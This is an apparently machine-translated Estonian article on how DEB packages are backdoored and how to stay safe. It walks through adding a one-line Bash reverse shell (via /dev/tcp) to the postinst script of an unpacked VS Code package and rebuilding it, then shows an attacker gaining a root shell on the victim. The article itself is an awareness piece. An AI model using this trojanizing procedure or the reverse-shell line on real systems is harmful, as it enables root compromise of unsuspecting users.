Kuidas DEB-paketid tagauksed on ja kuidas seda tuvastada

Võtmed kaasavõtmiseks

• DEB-pakette saab hõlpsasti tagaukse abil avada, võimaldades ründajatel sisestada teie süsteemi pahatahtlikku koodi, kui installite need juurõigustega.
• Nakatunud DEB-pakette on raske tuvastada, kuna viirusetõrjetarkvara või pilvelahendused, nagu VirusTotal, ei pruugi neid märgistada.
• Enda kaitsmiseks vältige DEB-pakettide allalaadimist juhuslikelt saitidelt, pidage kinni ametlikest allalaadimissaitidest või kogukonna usaldusväärsetel saitidel ja kaaluge turbetööriistade installimist, et kaitsta oma Linuxi süsteemi võrgu eest rünnakud.

DEB-failid on tarkvarapaketid, mis on Debianil põhinevate Linuxi distributsioonide tarkvara tarnimise peamine vorming.

DEB-pakettide installimiseks peate kasutama juurõigustega paketihaldurit, näiteks dpkg. Ründajad kasutavad seda ära ja süstivad nendesse pakettidele tagauksed. Kui installite need dpkg või mõne muu paketihalduriga, käivitatakse koos ka pahatahtlik kood ja see kahjustab teie süsteemi.

Uurime täpselt, kuidas DEB paketid on tagauksega ja mida saate enda kaitsmiseks teha.

Kuidas on DEB-paketid tagauksed?

Enne kui mõistate, kuidas DEB-paketid on tagauksega, uurime, mis on DEB-paketi sees. Demonstreerimiseks laadin Microsofti ametlikult veebisaidilt alla Microsoft Visual Studio Code DEB paketi. See on sama pakett, mille laadiksite alla, kui soovite installida VS-koodi Linuxi.

Lae alla:Visual Studio kood

Nüüd, kui sihtpakett on alla laaditud, on aeg see lahti pakkida. Saate DEB-paketi lahti pakkida, kasutades dpkg-deb käsuga -R lipp, millele järgneb sisu salvestamise tee:

dpkg-deb -R 

See peaks välja võtma VS-koodi paketi sisu.

Kausta liikudes leiate mitu kataloogi, kuid meie huvi on ainult DEBIAN kataloog. See kataloog sisaldab hooldaja skripte, mis käivitatakse installimise ajal juurõigustega. Nagu võisite juba aru saada, muudavad ründajad selles kataloogis olevaid skripte.

Demonstreerimiseks muudan ma postiinst skript ja lisage lihtne üherealine Bash pöörd-TCP kest. Nagu nimigi ütleb, on see skript, mis käivitatakse pärast paketi installimist süsteemi.

See sisaldab käske, mis viimistlevad konfiguratsioonid, nagu sümboolsete linkide seadistamine, sõltuvuste käsitlemine ja palju muud. Internetist leiate tonni erinevaid pöördkarpe. Enamik neist töötab samamoodi. Siin on ühe voodri pöördkesta näidis:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

Käsu selgitus:

• bash: See on käsk, mis kutsub Bashi kesta.
• - mina: Lipp käsib Bashil töötada interaktiivses režiimis, võimaldades reaalajas käsu I/O.
• >& /dev/tcp/ip/port: See suunab ümber standardväljund ja standardviga võrgupistikupessa, luues sisuliselt TCP-ühenduse ja .
• 0>&1: See suunab sisendi ja väljundi ümber samasse kohta, st võrgupistikupessa.

Asjatundmatute jaoks on reverse shell teatud tüüpi kood, mis sihtmasinas käivitamisel käivitab ühenduse tagasi ründaja masinaga. Vastupidised kestad on suurepärane viis tulemüüri piirangutest mööda hiilimiseks, kuna liiklust genereerib tulemüüri taga olev masin.

Muudetud skript näeb välja järgmine:

Nagu näete, on kõik sama, kuid lisatud on ainult üks rida, st meie Bashi pöördkesta. Nüüd peate failid tagasi ehitama ".deb"vormingus. Kasutage lihtsalt dpkg käsuga -- ehitada lipp või kasutamine dpkg-deb koos -b lipp, millele järgneb ekstraktitud sisu tee:

dpkg --build 
dpkg-deb -b 

Nüüd on tagauksega DEB-pakett valmis pahatahtlikele saitidele saatmiseks. Simuleerime stsenaariumi, kus ohver on DEB paketi oma süsteemi alla laadinud ja installib seda nagu mis tahes muud tavalist paketti.

Ülemine terminali paneel on ohvri POV jaoks ja alumine on ründaja POV. Ohver installib paketti sudo dpkg -i ja ründaja kuulab kannatlikult sissetulevaid ühendusi kasutades netcat käsk Linuxis.

Niipea kui installimine on lõppenud, pange tähele, et ründaja saab pöördkestaühenduse ja tal on nüüd juurjuurdepääs ohvri süsteemile. Nüüd teate, kuidas DEB paketid on tagauksega. Vaatame nüüd, kuidas saate end kaitsta.

Kuidas tuvastada, kas DEB-pakett on pahatahtlik

Nüüd, kui teate, et nakatunud DEB-paketid on asi, peate kindlasti mõtlema, kuidas nakatunud pakette leida. Alustuseks võite proovida kasutada a Linuxi viirusetõrjetarkvara nagu ClamAV. Kahjuks ei tähistanud ClamAV-i skannimine paketti seda pahatahtlikuna. Siin on skannimise tulemus:

Seega on pahatahtlikke DEB-pakette üsna raske tuvastada, kui teil pole loodud esmaklassilist viirusetõrjelahendust (mis ei garanteeri, et teid ei häkitakse). Proovime kasutada pilvelahendust nagu VirusTotali veebisait:

Nagu näete, ei tuvastanud VirusTotal selles midagi halba. Ainus viis end selliste ohtude eest kaitsta on järgida elementaarset turvahügieeni, näiteks mitte laadida faile alati tundmatutest allikatest faili räsi kontrollimineja üldiselt vältides varjulise tarkvara installimist.

Internet on selliseid ohte täis. Ainus viis surfata andmeid kaotamata on olla teadlik ja sirvida usaldusväärseid saite. Lisaks peaksite Linuxi puhul proovima leida, kas allalaaditaval tarkvaral on AppImage variant kuna need on iseseisev ja neid saab liivakasti paigutada ja seega hoida neid teie süsteemiga kontaktist eemal.

Ärge laadige DEB-pakette alla juhuslikelt saitidelt!

DEB-paketid ei ole oma olemuselt halvad, kuid ründajad saavad neid hõlpsalt relvastada ja pahaaimamatutele kasutajatele saata. Nagu näidatud, saab DEB-paketti hõlpsasti avada ja muuta kohandatud koodi lisamiseks vaid mõne käsuga, muutes selle pahavara saatmisel tavaliseks vektoriks.

Isegi lihtsad DEB-pakettide tagauksed jäävad parimatele viirusetõrjelahendustele tähelepanuta. Nii et parim, mida teha, on mängida turvaliselt, veebis surfates oma kainet mõistust kanda ja tarkvara alla laadida ainult ametlikelt allalaadimissaitidelt või kogukonna usaldusväärsetelt saitidelt.

Nüüd, kui olete teadlik turvariskidest, mis kaasnevad uutelt või tundmatutelt saitidelt DEB-pakettide installimisega, peaksite uue tarkvara installimisel olema ettevaatlik. Siiski ei piisa ainult sellest, mida installite. Teie Linuxi süsteem võib olla ka võrgurünnakute sihtmärk.

Võrgurünnaku korral turvalisuse tagamiseks peaksite kaaluma võrguturbetööriistade installimist.